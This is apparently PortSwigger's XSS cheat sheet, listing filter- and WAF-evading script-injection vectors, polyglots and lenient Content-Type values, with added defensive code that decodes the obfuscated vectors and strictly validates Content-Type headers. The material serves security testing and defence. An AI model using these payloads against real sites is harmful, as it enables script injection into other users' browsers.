Cross-site scripting (XSS) cheat sheet

This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector.

You can download a PDF version of the XSS cheat sheet.

This cheat sheet was brought to you by PortSwigger Research. Follow us on Twitter to receive updates.

Downloaded from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

This cheat sheet is updated regularly. Last updated: Mon, 21 Sep 2020 14:09:36 +0000.

Restricted characters

No parentheses using exception handling
<script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>

No parentheses using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval, without .
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect
<script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings
<script>location=name</script>

No parentheses using template strings
<script>alert`1`</script>

No parentheses using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>

Obfuscation

Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:'&#x25;&#x33;&#x43;script&#x25;&#x33;&#x45;alert(1)&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;script&#x25;&#x33;&#x45;'"></iframe>

SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
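The vectors above stack encoding layers (HTML entities, percent encoding, base64 data: URLs, JavaScript escapes, and nesting through srcdoc and javascript: URLs) so that the script a browser finally runs never appears in the raw markup. The following is an added example, written for this page rather than taken from the cheat sheet, of a Node.js decoder that peels those layers back in the order the browser applies them. The six vectors are embedded as constructed input; the attribute extraction is a deliberately small regex, not a full HTML parser.

```javascript
// Added example (not from the PortSwigger cheat sheet): recover the script a
// browser would execute from each Obfuscation vector. A raw-markup signature
// for "alert(" catches only the two vectors that leave the call in clear.
// Requires Node.js (uses Buffer).

// HTML entity decoding: decimal, hex and the named entities that matter for markup.
function decodeHtmlEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    const key = name.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, key) ? named[key] : m; // unknown: leave as-is
  });
}

// Percent decoding, as applied to the body of a javascript: or data: URL.
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// data:<mediatype>[;base64],<body>  ->  decoded body, or null if not a data: URL.
function decodeDataUrl(url) {
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(url);
  if (!m) return null;
  const body = decodePercent(m[2]);
  return /;base64$/i.test(m[1]) ? Buffer.from(body, 'base64').toString('utf8') : body;
}

// JavaScript \uHHHH and \xHH escapes in script text.
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})|\\x([0-9a-f]{2})/gi,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// First value of an attribute (double-quoted, single-quoted or unquoted).
function attr(html, name) {
  const re = new RegExp(`\\b${name}=(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(html);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Recover the executed script from one vector; null if no script is found.
function recoverScript(html, depth = 0) {
  if (depth > 4) return null;                       // bound nested srcdoc/javascript: documents
  const doc = decodeHtmlEntities(html);
  const srcdoc = attr(doc, 'srcdoc');
  if (srcdoc !== null) return recoverScript(srcdoc, depth + 1);   // srcdoc is a whole document
  const src = attr(doc, 'src');
  if (src !== null) {
    if (/^data:/i.test(src)) {
      const payload = decodeDataUrl(src);
      return payload === null ? null : decodeJsEscapes(payload);
    }
    const js = /^javascript:([\s\S]*)$/i.exec(src);
    if (js) {
      // javascript:'<markup>' evaluates to a string that becomes the frame's document
      const body = decodePercent(js[1]).trim();
      const lit = /^'([\s\S]*)'$|^"([\s\S]*)"$/.exec(body);
      return lit ? recoverScript(lit[1] ?? lit[2], depth + 1) : decodeJsEscapes(body);
    }
  }
  const inline = /<script[^>]*>([\s\S]*?)<\/script>/i.exec(doc);
  return inline ? decodeJsEscapes(inline[1]) : null;
}

// The six vectors from the Obfuscation section (constructed input for this example).
const OBFUSCATION_VECTORS = [
  '<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>',
  '<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>',
  '<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>',
  '<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>',
  '<iframe src="javascript:\'%3Cscript%3Ealert(1)%3C%2Fscript%3E\'"></iframe>',
  '<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>',
];

function recoverAll(vectors = OBFUSCATION_VECTORS) {
  return vectors.map((v) => recoverScript(v));
}

// How many vectors a naive signature on the raw markup would catch.
function rawSignatureHits(vectors = OBFUSCATION_VECTORS) {
  return vectors.filter((v) => v.includes('alert(')).length;
}
```

Every vector decodes to alert(1), while the raw signature only matches the two that leave the call itself unencoded. The decoder is one-way: it is enough for detection and triage, but the defence is still contextual output encoding at the injection point, since an attacker can always add a layer the decoder does not know.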

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string. Each vector is shown using window; the same vector works with self, this, top, parent, frames or globalThis in place of window.

String concatenation
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//

Comment syntax
';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//

Hex escape sequence
';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//

Hex escape sequence and base64 encoded string
';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//

Octal escape sequence
';window['\141\154\145\162\164']('\130\123\123');//

Unicode escape
';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//

RegExp source property
';window[/al/.source+/ert/.source](/XSS/.source);//

Hieroglyphy/JSFuck
';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//

Response content types

This section lists content types that can be used for XSS when you can inject into the Content-Type header. The PoC for each is <script>alert(document.domain)</script>.

Content-Type
text/plain; x=x, text/html
text/html, foobar
text/html(xxx
text/html xxx
text/html, xxx
text/html; xxx
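Each value above is accepted as text/html by a browser's lenient header parsing, which is why injecting into Content-Type is exploitable even when the application believes it set something harmless. The following is an added example, not from the cheat sheet, of the check an application should apply at the point where request data can influence the header: a strict parser for the RFC 7231 media-type grammar plus an allowlist of the types the endpoint may emit, with the header rebuilt from the parsed parts so that nothing from the raw value is copied through. The allowlist and the fallback type are assumptions of this example.

```javascript
// Added example (not from the PortSwigger cheat sheet): strict Content-Type
// validation. Browsers read the header leniently; this parser follows the
// RFC 7231 grammar  type "/" subtype *( OWS ";" OWS token "=" (token / quoted-string) )
// and rejects all six values from the table above.

const TOKEN = "[!#$%&'*+.^_`|~0-9A-Za-z-]+";                 // RFC 7230 tchar
const QUOTED = '"(?:[^"\\\\]|\\\\.)*"';                       // quoted-string with escapes
const PARAM = `\\s*;\\s*(${TOKEN})=(${TOKEN}|${QUOTED})`;
const MEDIA_TYPE = new RegExp(`^(${TOKEN})/(${TOKEN})((?:${PARAM})*)\\s*$`);
const PARAM_RE = new RegExp(PARAM, 'g');

// Parse a media type strictly; null for anything outside the grammar.
function parseMediaType(value) {
  const m = MEDIA_TYPE.exec(value);
  if (m === null) return null;
  const params = {};
  PARAM_RE.lastIndex = 0;
  let p;
  while ((p = PARAM_RE.exec(m[3])) !== null) params[p[1].toLowerCase()] = p[2];
  return { type: m[1].toLowerCase(), subtype: m[2].toLowerCase(), params };
}

// Types this (hypothetical) endpoint is allowed to emit; text/html deliberately excluded.
const ALLOWED = new Set(['text/plain', 'text/csv', 'application/json']);

// Header value rebuilt from parsed parts, or the fallback. The raw request
// value is never copied into the response header.
function safeContentType(requested, fallback = 'application/octet-stream') {
  const mt = parseMediaType(String(requested ?? ''));
  if (mt === null) return fallback;
  const essence = `${mt.type}/${mt.subtype}`;
  if (!ALLOWED.has(essence)) return fallback;
  const cs = (mt.params.charset ?? '').replace(/^"|"$/g, '');
  return /^[A-Za-z0-9_-]+$/.test(cs) ? `${essence}; charset=${cs.toLowerCase()}` : essence;
}

// The six header values from the table above (constructed input for this example).
const LENIENT_HTML_TYPES = [
  'text/plain; x=x, text/html',
  'text/html, foobar',
  'text/html(xxx',
  'text/html xxx',
  'text/html, xxx',
  'text/html; xxx',
];

// How many of the values the strict parser refuses.
function rejectedCount(values = LENIENT_HTML_TYPES) {
  return values.filter((v) => parseMediaType(v) === null).length;
}
```

The strict parser refuses all six: a comma, a parenthesis or a bare space is not a valid separator, and ; xxx is not a parameter. Strict parsing on its own is not sufficient, since a well-formed text/html would pass; the allowlist is what prevents the endpoint from ever being turned into an HTML response.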